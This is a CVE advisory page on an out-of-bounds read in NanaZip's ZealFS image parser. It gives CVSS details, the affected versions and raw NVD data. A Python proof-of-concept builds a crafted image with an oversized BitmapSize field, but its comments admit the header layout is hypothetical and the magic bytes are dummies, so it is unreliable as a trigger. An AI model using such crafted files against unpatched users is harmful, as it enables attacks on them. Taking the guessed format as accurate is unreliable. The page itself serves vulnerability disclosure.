Security Vulnerability Report
CVE-2026-42446 CVSS 4.4 MEDIUM

Published: 2026-05-12 20:16:42
Last Modified: 2026-05-14 15:49:26

Description

NanaZip is an open source file archiver. From 5.0.1252.0 to before 6.0.1698.0, a stack-based out-of-bounds read exists in the ZealFS filesystem image parser in NanaZip. The vulnerability is triggered when opening a crafted ZealFS v1 filesystem image. An attacker-controlled BitmapSize field in the file header drives an unbounded loop that reads past the end of a stack-allocated ZEALFS_V1_HEADER structure. This vulnerability is fixed in 6.0.1698.0.

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:m2team:nanazip:*:*:*:*:*:*:*:* - VULNERABLE
NanaZip 5.0.1252.0 up to, but not including, 6.0.1698.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct


# PoC to generate a crafted ZealFS v1 image
# Trigger: Stack-based out-of-bounds read via unbounded loop driven by BitmapSize
def create_crafted_zealfs(filename):
    # Simulate a minimal ZealFS v1 header structure (hypothetical layout based on the description)
    # Assuming BitmapSize is a 4-byte integer that follows the magic bytes and padding
    with open(filename, 'wb') as f:
        # Magic bytes (dummy)
        f.write(b'ZELA\x01\x00')
        f.write(b'\x00' * 8)  # Padding

        # Craft BitmapSize field (attacker controlled)
        # Set to a very large value to trigger the unbounded loop
        # e.g., 0xFFFFFFFF
        bitmap_size = 0xFFFFFFFF
        f.write(struct.pack('<I', bitmap_size))

        # Fill the rest to make it a valid file size
        f.write(b'\x00' * 100)


if __name__ == "__main__":
    create_crafted_zealfs("exploit_zealfs.bin")
    print("Crafted ZealFS image generated: exploit_zealfs.bin")
```

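References

https://github.com/M2Team/NanaZip/security/advisories/GHSA-4c79-hfr4-mqv9 (Mitigation, Vendor Advisory)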

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42446", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:41.900", "lastModified": "2026-05-14T15:49:25.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanaZip is an open source file archive. From 5.0.1252.0 to before 6.0.1698.0, a stack-based out-of-bounds read exists in the ZealFS filesystem image parser in NanaZip. The vulnerability is triggered when opening a crafted ZealFS v1 filesystem image. An attacker-controlled BitmapSize field in the file header drives an unbounded loop that reads past the end of a stack-allocated ZEALFS_V1_HEADER structure. This vulnerability is fixed in 6.0.1698.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:m2team:nanazip:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.1252.0", "versionEndExcluding": 
"6.0.1698.0", "matchCriteriaId": "60D88926-2653-48FD-A4FE-B8CB8EB39E55"}]}]}], "references": [{"url": "https://github.com/M2Team/NanaZip/security/advisories/GHSA-4c79-hfr4-mqv9", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}